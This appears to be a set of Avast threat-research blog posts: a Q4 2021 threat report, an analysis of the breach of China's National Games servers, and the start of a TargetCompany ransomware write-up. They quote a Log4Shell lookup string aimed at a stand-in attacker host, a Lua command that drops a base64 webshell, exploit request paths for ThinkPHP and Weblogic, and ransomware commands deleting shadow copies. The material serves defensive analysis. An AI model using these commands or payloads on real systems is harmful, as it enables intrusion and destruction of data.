Latin America has always been an interesting area in malware research due to the unique and creative TTPs employed by multiple threat groups operating within this regional boundary. During Q4’21, a threat group called Chaes dominated Brazil’s threat landscape, with infection attempts detected from more than 66,600 of our Brazilian customers. Compromising hundreds of WordPress web pages with the Brazilian TLD, Chaes serves malicious installers masquerading as Java Runtime installers in Portuguese. Using a complex Python in-memory loading chain, Chaes installs malicious Google Chrome extensions onto victims’ machines. These extensions are capable of intercepting and collecting data from popular banking websites in Brazil such as Mercado Pago, Mercado Livre, Banco do Brasil, and Internet Banking Caixa.

Ousaban is another high-profile regional threat group whose operations in Brazil can be traced back to 2018. Getting massive attention in Q2’21 and Q3’21, Ousaban remains active during the Q4’21 period with infection attempts detected from 6,000+ unique users. Utilizing a technique called side-loading, Ousaban’s malicious payload is loaded by first executing a legitimate Avira application within a Microsoft Installer. The download links to these installers are mainly found in phishing emails which is Ousaban’s primary method of distribution.

Anh Ho, Malware Researcher
Igor Morgenstern, Malware Researcher


Let’s go back in time a little bit at first, before we dive into Q4’21 ransomware activity. In Q3’21, ransomware warfare was escalating, without a doubt. Most active strains were more prevalent than ever before. There were newspaper headlines about another large company being ransomed every other day, a massive supply-chain attack via MSP, record amounts of ransom payments, and sky-high self-esteem of cybercriminals.

Ransomware carol found on a darknet malware forum.

While unfortunate, this havoc triggered a coordinated cooperation of nations, government agencies, and security vendors to hunt down ransomware authors and operators. The FBI, the U.S. Justice Department, and the U.S. Department of State started putting marks on ransomware gangs via multi-million bounties, the U.S. military acknowledged targeting cybercriminals who launch attacks on U.S. companies, and we even started witnessing actions by Russian officials. The most critical part was the busts of ransomware-group members by the FBI, Europol, and DoJ in Q4’21.

We believe all of this resulted in a significant decrease in ransomware attacks in Q4’21. In terms of the ransomware risk ratio, it was lower by an impressive 28% compared to Q3’21. We hope to see a continuation of this trend in Q1’22, but we are also prepared for the opposite.

This welcome Q/Q decrease in the risk ratio was evident in the majority of countries covered by our telemetry, with a few exceptions such as Bolivia, Uzbekistan, and Mongolia (all with a more than +400% increase), Kazakhstan and Belarus (where the risk ratio doubled Q/Q), Russia (+49%), Slovakia (+37%), and Austria (+25%).

The most prevalent strains from Q3’21 either vanished or significantly decreased in volume in Q4’21. For example, the operators and authors of the BlackMatter ransomware went silent, most probably because a $10 million bounty was put on their heads by the FBI. Furthermore, STOP ransomware, which was the most prevalent strain in Q3’21, was still releasing new variants regularly to lure users seeking pirated software, but the number of targeted (and protected) users dropped by 58% and its “market share” decreased by 36%. Another strain worth mentioning is Sodinokibi aka REvil – its presence decreased by 50% in Q4’21 and it will be interesting to monitor its future presence because of the circumstances happening in Q1’22 (greetings to the Sodinokibi/REvil gang members currently sitting in custody).

The most prevalent ransomware strains in Q4’21: 

  • STOP
  • WannaCry
  • Sodinokibi
  • Conti
  • CrySiS
  • Exotic
  • Makop
  • GlobeImposter
  • GoRansomware
  • VirLock

Not everything ransomware related was positive in Q4’21. For example, new strains were discovered that could quickly grow in prevalence, such as BlackCat (aka ALPHV), with its RaaS model introduced on darknet forums, or the low-quality Khonsari ransomware, which took the opportunity to be the first ransomware exploiting the aforementioned Log4j vulnerability, beating Conti in this race.

Last, but not least, I would like to mention the new free ransomware decryption tools we’ve released, this time for the AtomSilo, LockFile, and Babuk ransomware strains. AtomSilo is not the most prevalent strain, but it has been spreading constantly for more than a year, so we were happy to see our decryptor immediately start helping ransomware victims.

Jakub Křoustek, Malware Research Director

Remote Access Trojans (RATs)

The last weeks of Q4’21 are also known as “days of peace and joy”, and this claim also applies to malicious actors. As the graph of RAT activity for this quarter below shows, malware actors are just people and many of them took holiday breaks, which is probably why the activity level more than halved at the end of December. The periodic drops that can be seen are weekends, as most campaigns usually run from Monday to Thursday.

In the graph below, we can see a Q3/Q4 comparison of the RAT activity.

The heat map below shines with multiple colors like a Christmas tree, and among the countries with the highest risk ratio we see the Czech Republic, Singapore, Serbia, Greece, and Croatia. We also detected a high Q/Q increase of the risk ratio in Slovakia (+39%), Japan (+30%), and Germany (+23%).

Most prevalent RATs in Q4’21:

  • Warzone
  • njRAT
  • Remcos
  • NanoCore
  • AsyncRat
  • QuasarRAT
  • NetWire
  • SpyNet
  • DarkComet
  • DarkCrystal

The volume of attacks and protected users overall was similar to what we saw in Q3’21, but there were also increases within families such as Warzone and DarkCrystal (their activity more than doubled), SpyNet (+89%), and QuasarRAT (+21%).

A hot topic this quarter was the vulnerability in Log4j, and in addition to other malware types, some RATs were also spread thanks to it. The most prevalent were NanoCore, AsyncRat, and Orcus. Another new vulnerability exploited by RATs was CVE-2021-40449, which was used to elevate the permissions of malicious processes by exploiting a Windows kernel driver. Attackers used this vulnerability to download and launch the MysterySnail RAT. Furthermore, an important cause of the high NanoCore and AsyncRat detections was a malicious campaign abusing the cloud providers Microsoft Azure and Amazon Web Services (AWS). In this campaign, attackers used Azure and AWS as download servers for their malicious payloads.

But that’s not all: at the beginning of December, we found a renamed version of DcRat under the name SantaRat. This renamed version was a pure copy-paste of DcRat, but it shows that malware developers were also in the Christmas spirit and perhaps hoped that their version of Santa would visit many households as well, to deliver their gift. To be clear, DcRat is itself a slightly modified version of AsyncRat.

The developers of DcRat weren’t the only ones playing the role of Santa and distributing gifts. Many other malware authors also delivered RAT related gifts to us in Q4’21.

The first one was the DarkWatchman RAT, written in JavaScript, and on top of the choice of programming language, it differs from other RATs in one other special property: it lives in the system registry. This means that it uses registry keys to store its code, as well as temporary data, thus making it fileless.

Another RAT that appeared was ActionRAT, released by the SideCopy APT group in an attack on the government of Afghanistan. This RAT uses base64 encoding to obfuscate its strings and C&C domains. Its capabilities are quite simple, but still powerful: it can execute commands from a C&C server, upload, download, and execute files, and retrieve the victim’s machine details.

We also observed two new RATs spreading on Linux systems. CronRAT's name already tells us what it uses under the hood, but for what? This RAT uses cron jobs, which are basically scheduled tasks on Linux systems, to store its payloads. These tasks were scheduled for February 31 (a non-existent date), so they were never triggered and the payload could remain hidden. The second RAT from the Linux duo was NginRAT, which was found on servers previously infected with CronRAT and served the same purpose: providing remote access to the compromised systems.
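As a quick illustration of why the February 31 trick works: cron accepts the day-of-month and month fields as syntactically valid, but that combination never occurs on any calendar, so the job never fires and the crontab entry serves only as a hiding place. A minimal Python check confirms the date is invalid:

```python
from datetime import date

# February 31 does not exist in any year, so a cron job scheduled
# for day 31 of month 2 will never be triggered; the entry only
# serves as storage for the payload.
try:
    date(2021, 2, 31)
    hidden = False
except ValueError as e:
    hidden = True
    print("invalid date:", e)  # day is out of range for month

print("job would never fire:", hidden)
```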

Even though we saw a decrease in RAT activity at the end of December it won’t stay that way. Malicious actors will likely come back from their vacations fresh and will deliver new surprises. So stay tuned.

Samuel Sidor, Malware Researcher


We recorded a significant increase in rootkit activity in Q4’21, illustrated in the chart below. This phenomenon can be explained by the increase in adware activity, since the most active rootkit was the Cerbu rootkit. The primary function of Cerbu is to hijack browser homepages and redirect site URLs according to the rootkit configuration, so this rootkit can be easily deployed and configured for adware.

The graph below shows that China is still the most at-risk country in terms of protected users, although attacks in China decreased by about 17%.

In Q4’21, the most significant increases in risk ratio were in Egypt and Vietnam. On the other hand, Taiwan, Hong Kong, and China reported approximately the same values as in the previous quarter. We protected the most users in the Czech Republic, the Russian Federation, China, and Indonesia.

Martin Chlumecký, Malware Researcher

Technical support scams (TSS)

During the last quarter, we registered a significant wave of increased tech support scam activity. In Q4’21, we saw peaks at the end of December and we are already seeing some active spikes in January.

Activity of a long-term TSS campaign

The top targeted countries for this campaign are the United States, Brazil, and France. The activity of this campaign shows the tireless effort of the scammers and proves the increasing popularity of this threat.

In combination with other ongoing long-term campaigns, our data also shows two high spikes of activity from another campaign, lasting no longer than a few days and heavily targeting the United States and Canada, as well as other countries in Europe. This campaign peaked at the end of November and the beginning of December, then slowly died out.

The rise and slow fall of the second campaign

Example of a typical URL for this short campaign:



We also noticed attempts at innovation as new variants of TSS samples appeared: not just the typical locked browser with error messages, but also other imitations, like Amazon Prime and PayPal. We are, of course, tracking these new variants and will see how popular they become in the next quarter.

Overall TSS activity for Q4

Alexej Savčin, Malware Analyst

Vulnerabilities and Exploits

As was already mentioned in the foreword, the vulnerability news in Q4’21 was dominated by Log4Shell. This vulnerability in Log4j – a seemingly innocent Java logging utility – took the infosec community by storm. It was extremely dangerous because of the ubiquity of Log4j and the ease of exploitation, which was made even easier by several PoC exploits, ready to be weaponized by all kinds of attackers. The root of the vulnerability was an unsafe use of JNDI lookups, a vulnerability class that Hewlett Packard researchers Alvaro Muñoz and Oleksandr Mirosh already warned about in their 2016 BlackHat talk. Nevertheless, the vulnerability existed in Log4j from 2013 until 2021, for a total of eight years.

For the attackers, Log4Shell was the greatest thing ever. They could just try to stuff the malicious string into whatever counts as user input and observe if it gets logged somewhere by a vulnerable version of Log4j. If it does, they just gained remote code execution in the absence of any mitigations. For the defenders on the other hand, Log4Shell proved to be a major headache. They had to find all the software in their organization that is (directly or indirectly) using the vulnerable utility and then patch it or mitigate it. And they had to do it fast, before the attackers managed to exploit something in their infrastructure. To make things even worse, this process had to be iterated a couple of times, because even some of the patched versions of Log4j turned out not to be that safe after all.

From a research standpoint, it was interesting to observe the way the exploit was adopted by various attackers. First, there were only probes for the vulnerability, abusing the JNDI DNS service provider. Then, the first attackers started exploiting Log4Shell to gain remote code execution using the LDAP and RMI service providers. The JNDI strings in-the-wild also became more obfuscated over time, as the attackers started to employ simple obfuscation techniques in an attempt to evade signature-based detection. As time went on, more and more attackers exploited the vulnerability. In the end, it was used to push all kinds of malware, ranging from simple coinminers to sophisticated APT implants.
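As an illustration of the obfuscation arms race described above, consider the widely published textbook form of the JNDI lookup string and one of its equally public obfuscated variants (shown here purely from a detection perspective): a naive substring signature catches the former but not the latter, even though Log4j resolves both identically via nested lookups.

```python
# Sketch of why naive signature matching failed against obfuscated
# Log4Shell probes. Both strings are well-known public examples;
# the attacker host is a placeholder.
plain      = "${jndi:ldap://attacker.example/a}"
obfuscated = "${${lower:j}${lower:n}di:ldap://attacker.example/a}"

def naive_signature(s: str) -> bool:
    # The obvious detection: look for the literal lookup prefix.
    return "${jndi:" in s

print(naive_signature(plain))       # True  -- caught by the signature
print(naive_signature(obfuscated))  # False -- evades it, yet Log4j
                                    # evaluates ${lower:j} to "j" and
                                    # resolves the same JNDI lookup
```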

In other vulnerability news, we continued our research into browser exploit kits. In October, we found that Underminer implemented an exploit for CVE-2021-21224 to join Magnitude in attacking unpatched Chromium-based browsers. While Magnitude stopped using its Chromium exploit chain, Underminer is still using it with a moderate level of success. We published a detailed piece of research about these Chromium exploit chains, so make sure to read it if you’d like to know more.

Jan Vojtěšek, Malware Researcher

Web skimming 

One of the countries most affected by web skimming in Q4’21 was Saudi Arabia; in contrast with Q3’21, we protected four times as many users there in Q4. This was caused by an infection of the e-commerce sites souqtime[.]com and swsg[.]co. The latter loads malicious code from dev-connect[.]com[.]de. This domain can be connected to other known web skimming domains via the common IP 195[.]54[.]160[.]61. The malicious code responsible for stealing credit card details loads only on the checkout page. In this particular case, it is almost impossible for the customer to recognize that the website is compromised, because the attacker steals the payment details from the existing payment form. The payment details are then sent to the attacker's website via a POST request with custom encoding (multiple base64 passes and a substitution). The data sending is triggered on an “onclick” event, and each time the text from all input fields is sent.
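As a rough model of the layered encoding described above, here is an illustrative Python sketch of multiple base64 passes plus a character substitution. This is not the skimmer's actual scheme (which we do not reproduce), just a demonstration of the concept and of why such output evades simple pattern matching.

```python
import base64

# Illustrative sketch only: repeated base64 plus a trivial,
# self-inverse character substitution. NOT the skimmer's real scheme.
SWAP = str.maketrans("ABXYabxy", "XYABxyab")  # swaps A<->X, B<->Y, a<->x, b<->y

def encode(payload: str, rounds: int = 2) -> str:
    data = payload.encode()
    for _ in range(rounds):          # layer the base64 passes
        data = base64.b64encode(data)
    return data.decode().translate(SWAP)  # final substitution step

def decode(blob: str, rounds: int = 2) -> str:
    data = blob.translate(SWAP).encode()  # SWAP is its own inverse
    for _ in range(rounds):
        data = base64.b64decode(data)
    return data.decode()

stolen = "card=4111111111111111&cvv=123"   # fake example data
assert decode(encode(stolen)) == stolen    # round-trip recovers the input
```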

In Australia, the most protected users were visitors of mobilitycaring[.]com[.]au. During Q4’21, this website was sending payment details to two different malicious domains: the first was stripe-auth-api[.]com, and later the attacker changed it to booctstrap[.]com, a typosquat mimicking the well-known Bootstrap framework. This is not the first case we observed where an attacker changed the exfiltration domain during the infection.

In Q4’21, we protected nearly twice as many users in Greece as in Q3’21. The reason behind this was the infected site retro23[.]gr. Unlike the infected site from Saudi Arabia (swsg[.]co), the payment form is not present on this website, so the attacker inserted their own. But as we can see in the image below, that form does not fit the design of the website. This gives customers the opportunity to notice that something is wrong and not fill in their payment details. We published a detailed analysis of web skimming attacks, where you can learn more.

Pavlína Kopecká, Malware Analyst


Premium SMS – UltimaSMS

Scams that siphon victims’ money away through premium SMS subscriptions have resurfaced in the last few months. Available on the Play Store, they mimic legitimate applications and games, often featuring catchy adverts. Once downloaded, they prompt the user to enter their phone number to access the app. Unbeknownst to the user, they are then subscribed to a premium SMS service that can cost up to $10 per week.

As users often aren’t inherently familiar with how recurring SMS subscriptions work, these scams can run for months unnoticed and cause an expensive phone bill for the victims. Uninstalling the app doesn’t stop the subscription, the victim has to contact their provider to ensure the subscription is properly canceled, adding to the hassle these scams create.

Avast has identified one such family of Premium SMS scams – UltimaSMS. These applications serve only to subscribe victims to premium SMS subscriptions and do not have any further functions. The actors behind UltimaSMS extensively used social media to advertise their applications and accrued over 10M downloads as a result.

According to our data, the most targeted countries were those in the Middle East, like Qatar, Oman, Saudi Arabia, and Kuwait, although we’ve seen instances of these threats active in other areas as well, like Europe, for instance in our home country, the Czech Republic. We attribute this widespread reach of UltimaSMS to its former availability on the Play Store and to localized social media advertisements.

Jakub Vávra, Malware Analyst

Spyware – Facestealer

A newcomer this year, Facestealer, resurfaced on multiple occasions in Q4’21. It is spyware that injects JavaScript into the built-in Android WebView browser in order to steal Facebook credentials. Masquerading as photo editors, horoscopes, fitness apps, and others, it was a continued presence in the last few months of 2021 and appears to be here to stay.

Facestealer apps look legitimate at first, and they fulfill their described app functions. After a period of time, the apps’ C&C server sends a command to prompt the user to sign in to Facebook to continue using the app without adverts. Users may have their guard down as they’ve used the app without issue up until that point. The app loads the legitimate Facebook login website and injects malicious JS code to skim the user’s login credentials. The user may be unaware their social media account has been breached.

It is likely that, as with other spyware families we’ve seen in the past, Facestealer will be reused in order to target other social media platforms or even banks. The mechanism used in the initial versions can be adjusted as the attackers can load login pages from potentially any platform.

According to our threat data, this threat was mostly targeting our users in Africa and surrounding islands – Niger and Nigeria in the lead, followed by Madagascar, Zimbabwe and others.

Jakub Vávra, Malware Analyst
Ondřej David, Malware Analysis Team Lead

Fake Covid themed apps on the decline

Despite the pandemic raging on and governments implementing various new measures and introducing new applications such as Covid Passports, there’s been a steady decline in the number of fake Covid apps. Various bankers, spyware and trojans that imitated official Covid apps flooded the mobile market during 2020 and first half of 2021, but it seems they have now returned to disguising themselves as delivery apps, utility apps and others that we have seen before.

It’s possible that users aren’t as susceptible to fake Covid apps anymore, or that the previous methods of attack proved more efficient for these pieces of malware, as evidenced, for example, by the massively successful campaigns of FluBot, which we reported on previously. Cerberus/Alien variants stood out as the bankers on the frontlines of fake Covid-themed apps. But similarly to some of this year’s newcomers, such as the FluBot or Coper bankers, the focus has now shifted back to the “original” attempts to breach users’ phones through SMS phishing while pretending to be a delivery service app, bank app, or other apps.

During the beginning of the pandemic, we were able to collect hundreds to thousands of new unique samples monthly, disguising themselves as various apps connected to providing Covid information, Covid passes, vaccination proofs, or contact tracing, or simply inserting the Covid/Corona/Sars keywords into their names or icons. During the second half of 2021, this trend steadily dropped. In Q4’21, we saw only low tens of such new samples.

Jakub Vávra, Malware Analyst
Ondřej David, Malware Analysis Team Lead

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alex Savčin
  • Anh Ho
  • Daniel Beneš
  • Igor Morgenstern
  • Jakub Kaloč
  • Jakub Křoustek
  • Jakub Vávra
  • Jan Rubín
  • Jan Vojtěšek
  • Luigino Camastra
  • Martin Hron
  • Martin Chlumecký
  • Michal Salát
  • Ondřej David
  • Pavlína Kopecká 
  • Samuel Sidor
Data analysts
  • Pavol Plaskoň
  • Stefanie Smith

The post Avast Q4/21 Threat report appeared first on Avast Threat Labs.

Analysis of Attack Against National Games of China Systems


On September 15, 2021 the National Games of China began in the Chinese city of Shaanxi. It is an event similar if not identical to the Olympics, but only hosts athletes from China. Earlier in September, our colleague David Álvarez found a malware sample with a suspicious file extension of a picture and decided to investigate where it came from. Later, he also found a report of the incident from the National Games IT team on VirusTotal stating that the attack occurred before the Games started. Attached to the report were access logs from the web server and SQL database. By analyzing these logs, we gathered initial information about the attack. These logs include only the request path and, unfortunately, do not reveal the content of POST requests, which would be needed to fully understand the commands the attackers sent to their web shells. Even with this limited information, we were able to outline the attack and determine the initial point of intrusion with moderate confidence.

In this post, we share our own research on the incident, the samples, and the exploits used by the attackers, detailing what appears to be a successful breach of systems hosting content for the National Games prior to the event. We based our research on publicly accessible information about the incident; the analyzed samples were already present on VirusTotal.

Based on the initial information from the report and our own findings, it appears the breach was successfully resolved prior to the start of the games. We are unable to detail what actions the attackers may have taken against the broader network. We also are unable to make any conclusive attribution of the attackers, though have reason to believe they are either native Chinese-language speakers or show high fluency in Chinese.

Gaining access

The evidence indicates that the attackers gained initial code execution at around 10:00 AM local time on September 3, 2021 and installed their first reverse shell by executing scripts called runscript.lua. We suspect this happened via an arbitrary file-read exploit targeting either route.lua (which, according to the API (Application Programming Interface) extracted from various JavaScript files, is a Lua script with a lot of functionality, from handling login authentication to manipulating files) or index.lua in combination with the index.lua?a=upload API, which was not used by anyone else in the rest of the network log. It’s also worth noting that runscript.lua was not mentioned in the report or included among the attacker-uploaded files.

After gaining initial access, the attackers uploaded several other reverse shells, such as conf.lua, miss1.php or admin2.php (see Table 2 for source code), to gain a more permanent foothold in the network in case one of the shells got discovered. These reverse shells receive commands via POST requests, so the data is not present in the logs attached to the report, which contain only the URL path.

In the screenshot we can see that the attackers were getting a lot of data returned to them from the backdoors (highlighted)

Moreover, the logs in the report do not contain enough information about the network traffic for us to determine with certainty how and when the attackers obtained their first web shell. We estimated this by looking for the point in time from which they uploaded and interacted with the first custom web shell we could find.

What they did there

The attackers started doing some tests on what they were able to upload to the server. From August 26, 2021 to September 9, 2021 the attackers tried submitting files with different file-types and also file extensions. For instance, they submitted the same legitimate image ( 7775b6a45da80c1a8a0f8e044c34be823693537a0635327b967cc8bff3cb349a) with different file extensions: ico, lua, js, luac, txt, html and rar.

After gaining knowledge of which file types were blocked and allowed, they tried to submit executable code. Of course, they started by submitting PoCs instead of directly executing a webshell, because submitting PoCs is stealthier and also reveals what the malicious code is allowed to do. For instance, one of the files uploaded was this Lua script camouflaged as an image (20210903-160250-168571-ab1c20.jpg):


Taking advantage of the Lua io.popen function, which executes a command and returns process output, the attackers used variants of the following command camouflaged as images to test different webshells:

io.popen("echo 'Base64EncodedWebshell' |base64 -d  > ../mod/remote/miss.php")
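For defenders, payloads dropped this way can often be recovered directly from the logged command line. Below is a minimal sketch of that recovery (Python used purely for illustration; the regex shape and the harmless stand-in payload are our assumptions, not material from the incident):

```python
import base64
import re

def extract_webshell(logged_command: str) -> bytes:
    """Pull the Base64 payload out of an
    `echo '<b64>' | base64 -d > <path>` style command and decode it."""
    match = re.search(r"echo\s+'([A-Za-z0-9+/=]+)'", logged_command)
    if match is None:
        raise ValueError("no Base64 payload found in command")
    return base64.b64decode(match.group(1))

# Demo with a harmless stand-in payload instead of a real webshell
payload = b"<?php echo 'hi'; ?>"
encoded = base64.b64encode(payload).decode()
cmd = "io.popen(\"echo '%s' |base64 -d > ../mod/remote/miss.php\")" % encoded
assert extract_webshell(cmd) == payload
```

In a real investigation, the decoded bytes could then be hashed and checked against known webshell samples.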

They tested different Chinese webshells (e.g., the Godzilla webshell), but this information is not enough to confidently attribute the attack to any threat actor.

The attackers decided to reconfigure the web server by uploading their own www.conf file camouflaged as a PNG file consisting of a default configuration but allowing the .lua extension to be executed. We suspect that the server was configured to execute new threads in a thread pool which didn’t work for Rebeyond Behinder (a powerful Chinese webshell) they wanted to execute. They were not able to successfully reconfigure the server to execute it. So, as final payload, they uploaded and ran an entire Tomcat server properly configured and weaponized with Rebeyond Behinder.

It is important to mention that they were able to upload some tools (dnscrypt-proxy, fscan, mssql-command-tool, behinder) to the server and execute a network scanner (fscan) and a custom one-click exploitation framework that we want to discuss below in more detail.

The aforementioned Chinese scanner and exploitation framework is written in the Go programming language and distributed as a single binary, which allows attackers to execute all the steps of exploitation simply by feeding it an IP or a range of IPs (passed as arguments to the program or in a text file), making it an excellent tool for quickly compromising computer systems within a network environment.

The tool is well organized. It is structured with plugins that allow it to perform all the necessary steps to autonomously hack other devices within the same network.

  1. Plugins/Web/Finger: Performs a fingerprint to recognize services. Currently, it supports the following fingerprints: IBM, Jboss, shiro, BIG-IP, RuiJie, Tomcat, Weaver, jeecms, seeyon, shterm, tongda, zentao, Ueditor, ioffice, outlook, yongyou, Coremail, easysite, FCKeditor, Fortigate, FineReport, SangforEDR, Springboot, thinkphp_1, thinkphp_2, thinkphp_3, thinkphp_4, easyConnect and weblogic_async.
  2. Plugins/Service: Attacks services in order to get access to it. Currently, it supports the following services: ssh, smb, redis, mysql, mssql, ms17010 (EternalBlue SMB exploit) and ftp.
  3. Plugins/PwdTxt: Short username and password dictionaries for each service in Plugins/Service, allowing a brief brute-force attack on the service.
  4. Plugins/Web/Poc: Modules to exploit common web applications. Currently, it supports the following exploits: Jeecms_SSRF1, yongyou_rce1, RuiJie_RCE1, outlook_ews, thinkphp_RCE1, thinkphp_RCE2, thinkphp_RCE3, thinkphp_RCE4, thinkphp_RCE5, thinkphp_RCE6, RuiJie_Upload1, Weaver_Upload1, yongyou_upload1, weblogic_console, phpstudy_backdoor, yongyou_readFile1, Jboss_unAuthConsole, Jboss_CVE_2017_12149, weblogic_CVE_2019_2618.

An example of a Plugin is plugins/Web/Poc/Weblogic_CVE_2019_2618

On the left side of the following screenshot you can see a scan executed in our lab, targeting a Python server (terminal on the right side of the screenshot), with the exploit payload request highlighted in a red rectangle.

For more information on the payloads, please, refer to IoCs, Table 2.


The procedure followed by the attackers hacking the 14th National Games of China is not new at all. They gained access to the system by exploiting a vulnerability in the web server. This shows the need to keep software updated and properly configured, and to stay aware of possible new vulnerabilities in applications by using vulnerability scanners.

The most fundamental security countermeasure for defenders is keeping the infrastructure up to date in terms of patching, especially the Internet-facing infrastructure.

Prevention should be the first priority for both internal and Internet facing infrastructure.

Webshells are a post-exploitation tool that can be very difficult to detect. Some webshells don’t even touch the filesystem, residing only in memory, which makes them even harder to detect and identify. Once implanted, webshells are mostly identified via unusual or anomalous network traffic indicators.

To protect against this kind of attack, it is important to deploy more layers of protection (i.e. SELinux, Endpoint Detection and Response solutions and so on) such that you can detect and quickly act when a successful intrusion happens.

After gaining access, the attackers tried to move through the network using exploits and by brute-forcing services in an automated way. Since attackers reaching this point is a very real possibility, defenders must be prepared. Real-time monitoring of computer systems and networks is the right way to do that.

Finally, the attackers used an exploitation framework written in the Go programming language to move through the network. Go is becoming more and more popular and can be compiled for multiple operating systems and architectures into a single binary containing all its dependencies. We therefore expect to see more malware and grey tools written in this language in future attacks, especially in IoT attacks, where a broad variety of devices leveraging different kinds of processor architectures is involved.


SHA + original filename Description
Encrypted ZIP file
Shellcode dropper
Single line shellcode
Rebeyond shellcode dropper
Shellcode dropper
UPX compressed Mssql Toolkit
FScan for Linux
Custom exploitation framework
Rebeyond Behinder webshell
UPX Compressed DNS Proxy for Linux
Table 1
Proof of concept Payload
Yongyou_upload1 Request GET /aim/equipmap/accept.jsp
ThinkPHP_RCE4 Request POST /index.php?s=/Index/\\think\\app/invokefunction
Data function=call_user_func_array&vars[0]=base64_encode&vars[1][]=123456
ThinkPHP_RCE5 Request POST /index.php?s=/Index/\\think\\app/invokefunction
Data function=call_user_func_array&vars[0]=base64_encode&vars[1][]=123456
ThinkPHP_RCE6 Request POST /public/?s=captcha/MTIzNDU2
Data _method=__construct&filter[]=print_r&method=GET&s=1
yongyou_rce1 Request GET /service/monitorservlet
RuiJie_Upload1 Request GET /ddi/server/fileupload.php
Weaver_Upload1 Request GET /page/exportImport/uploadOperation.jsp
phpstudy backdoor Request GET /
Headers User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36
Accept-Encoding: gzip,deflate
ThinkPHP_RCE2 Request GET /index.php?s=index/think\\request/input?data=123456&filter=base64_encode
yongyou_readFile1 Request GET /NCFindWeb?service=&filename=
Request GET /bea_wls_deployment_internal/DeploymentService
Outlook ews (Interface blasting) Request GET /ews
ThinkPHP_RCE1 Request GET /index.php?s=index/\\think\\app/invokefunction&function=
ThinkPHP_RCE3 Request GET /index.php?s=index/\\think\\Container/invokefunction&function=
CVE_2020_14882 Request GET /console/
Jboss JMXInvokerServlet (Deserialization) Request GET /index.php?s=index/\\think\\Container/invokefunction&function=
Jboss (Unauthorized access to the console) Request GET /jmx-console/index.jsp
Jboss JMXInvokerServlet (Deserialization) Request GET /index.php?s=index/\\think\\Container/invokefunction&function=
jeecms SSRF to Upload Request GET /ueditor/getRemoteImage.jspx?upfile=
RuiJie_RCE1 Request GET /guest_auth/guestIsUp.php
Table 2


  • miss1.php
  • conf.lua
  • admin2.php

IoC repository

Files and IoCs are in our IoC repository

The post Analysis of Attack Against National Games of China Systems appeared first on Avast Threat Labs.

Decrypted: TargetCompany Ransomware

7 February 2022 at 15:02

On January 25, 2022, a victim of a ransomware attack reached out to us for help. The extension of the encrypted files and the ransom note indicated the TargetCompany ransomware (not related to Target the store), which can be decrypted under certain circumstances.

Modus Operandi of the TargetCompany Ransomware

When executed, the ransomware does some actions to ease its own malicious work:

  1. Assigns the SeTakeOwnershipPrivilege and SeDebugPrivilege for its process
  2. Deletes special file execution options for tools like vssadmin.exe, wmic.exe, wbadmin.exe, bcdedit.exe, powershell.exe, diskshadow.exe, net.exe and taskkill.exe
  3. Removes shadow copies on all drives using this command:
    %windir%\sysnative\vssadmin.exe delete shadows /all /quiet
  4. Reconfigures boot options:
    bcdedit /set {current} bootstatuspolicy ignoreallfailures
    bcdedit /set {current} recoveryenabled no
  5. Kills some processes that may hold open valuable files, such as databases:
List of processes killed by the TargetCompany ransomware
MsDtsSrvr.exe ntdbsmgr.exe
ReportingServecesService.exe oracle.exe
fdhost.exe sqlserv.exe
fdlauncher.exe sqlservr.exe
msmdsrv.exe sqlwrite

After these preparations, the ransomware gets the mask of all logical drives in the system using the GetLogicalDrives() Win32 API. Each drive is checked for its drive type by GetDriveType(). If the drive is valid (fixed, removable or network), encryption of the drive proceeds. First, every drive is populated with the ransom note file (named RECOVERY INFORMATION.txt). When this task is complete, the actual encryption begins.
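The drive-selection step can be illustrated with a small sketch (Python, purely illustrative; the real malware calls the Win32 APIs directly). GetLogicalDrives() returns a bitmask in which bit 0 corresponds to A:, bit 1 to B:, and so on:

```python
def drives_from_mask(mask: int) -> list[str]:
    """Decode a GetLogicalDrives()-style bitmask: bit 0 = A:, bit 1 = B:, ..."""
    return [chr(ord('A') + bit) + ':' for bit in range(26) if mask & (1 << bit)]

# 0b1101 has bits 0, 2 and 3 set
print(drives_from_mask(0b1101))  # ['A:', 'C:', 'D:']
```

The malware would then pass each letter to GetDriveType() and keep only drives of type DRIVE_REMOVABLE (2), DRIVE_FIXED (3), and DRIVE_REMOTE (4).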


To keep the infected PC working, TargetCompany avoids encrypting certain folders and file types:

List of folders avoided by the TargetCompany ransomware
msocache boot Microsoft Security Client Microsoft MPI
$windows.~ws $windows.~bt Internet Explorer Windows Kits
system volume information mozilla Reference Microsoft.NET
intel boot Assemblies Windows Mail
appdata windows.old Windows Defender Microsoft Security Client
perflogs Windows Microsoft ASP.NET Package Store
application data
WindowsPowerShell Core Runtime Microsoft Analysis Services
tor browser Windows NT Package Windows Portable Devices
Windows Store Windows Photo Viewer
Common Files Microsoft Help Viewer Windows Sidebar

List of file types avoided by the TargetCompany ransomware
.386 .cpl .exe .key .msstyles .rtp
.adv .cur .hlp .lnk .msu .scr
.ani .deskthemepack .hta .lock .nls .shs
.bat .diagcfg .icl .mod .nomedia .spl
.cab .diagpkg .icns .mpa .ocx .sys
.cmd .diangcab .ico .msc .prf .theme
.com .dll .ics .msi .ps1 .themepack
.drv .idx .msp .rom .wpx

The ransomware generates an encryption key for each file (0x28 bytes). This key is split into a ChaCha20 encryption key (0x20 bytes) and a nonce (0x08 bytes). After the file is encrypted, the key is protected by a combination of Curve25519 elliptic curve + AES-128 and appended to the end of the file. The scheme below illustrates the file encryption. Red-marked parts show the values that are saved into the file tail after the file data is encrypted:
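As a sketch of this key handling (Python, illustrative only; the key-then-nonce layout follows the description above, though the exact field order inside the malware binary is our reading of it):

```python
import os

KEY_BLOB_LEN = 0x28    # per-file key material
CHACHA_KEY_LEN = 0x20  # ChaCha20 key
NONCE_LEN = 0x08       # nonce

def split_file_key(blob: bytes) -> tuple[bytes, bytes]:
    """Split the 0x28-byte per-file key material into a ChaCha20 key and nonce."""
    if len(blob) != KEY_BLOB_LEN:
        raise ValueError("expected 0x28 bytes of key material")
    return blob[:CHACHA_KEY_LEN], blob[CHACHA_KEY_LEN:]

key, nonce = split_file_key(os.urandom(KEY_BLOB_LEN))
assert len(key) == 0x20 and len(nonce) == 0x08
```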

The exact structure of the file tail, appended to the end of each encrypted file, is shown as a C-style structure:

Every folder with an encrypted file contains the ransom note file. A copy of the ransom note is also saved into c:\HOW TO RECOVER !!.TXT

The personal ID, mentioned in the file, is the first six bytes of the personal_id, stored in each encrypted file.

